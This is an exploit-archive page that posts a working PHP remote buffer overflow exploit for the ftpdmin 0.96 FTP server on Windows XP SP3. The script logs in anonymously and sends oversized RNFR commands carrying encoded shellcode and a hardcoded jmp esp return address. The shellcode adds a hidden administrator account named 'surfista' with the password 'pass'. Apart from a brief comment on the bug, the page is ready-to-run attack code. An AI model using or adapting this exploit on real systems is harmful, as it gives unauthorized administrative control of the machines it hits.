exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ftpdmin 0.96 Buffer Overflow

ftpdmin 0.96 Buffer Overflow
Posted Apr 14, 2009
Authored by Nine:Situations:Group | Site retrogod.altervista.org

ftpdmin version 0.96 RNFR remote buffer overflow exploit for XP SP3.

tags | exploit, remote, overflow
SHA-256 | 14f9582635a04a183b0c1e61df98e2ba135bc5eb659e5c49b2daa8a46af6e98c

ftpdmin 0.96 Buffer Overflow

Change Mirror Download
<?php
/*
ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
by Nine:Situations:Group::surfista
software site: http://www.sentex.net/~mwandel/ftpdmin/
our site: http://retrogod.altervista.org/

bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to
the second memory region.
We have a very small set of chars that we can use ,RNFR (Rename From) command
accept pathnames as argument, so characters whose integer representations are
in the range from zero through 31 and reserved chars are not allowed!
*/

error_reporting(7);
$ftp_server = "192.168.0.1";
$ftp_user = "anonymous";
$ftp_pass = "anon@email.com";

function ftp_cmd($cmd){
global $conn_id;
echo "-> ".$cmd."\n";
$buff=ftp_raw($conn_id,$cmd);
}

#WinExec shellcode of mine, enconded with the alpha2 tool by SkyLined, adds
#a "surfista" admin user with pass "pass"
#contains hardcoded address, re-encode command:
#alpha2 esp < shdmp.txt
$____scode="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
"Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5".
"prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN".
"w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw".
"4gPqcpupr3VQybSrTE1kOA";
#do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space
$____code ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
"NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA";
if (strlen($____scode) > 272) {die("[!] shellcode too large!");}
$conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server");
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo "(*) Connected as $ftp_user@$ftp_server\n";
} else {
die("(!) Unable to connect as $ftp_user\n");
}
$____jnk = str_repeat("\x66",272 - strlen($____scode));
$____eip="\x44\x3a\x41\x7e"; //0x7E413A44 jmp esp, user32.dll xp sp3
$____jnk_ii = str_repeat("\x66",119 - strlen($____code));
$____bof=$____scode.$____jnk.$____eip.$____code.$____jnk_ii;
$____boom="RNFR ".str_repeat("x",0x0096);
ftp_cmd($____boom);
$____boom="RNFR ".$____bof;
ftp_cmd($____boom);
$____boom="RNFR ".str_repeat("x",0x0208);
ftp_cmd($____boom);
ftp_close($conn_id);
echo "(*) Done !\n";
?>

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close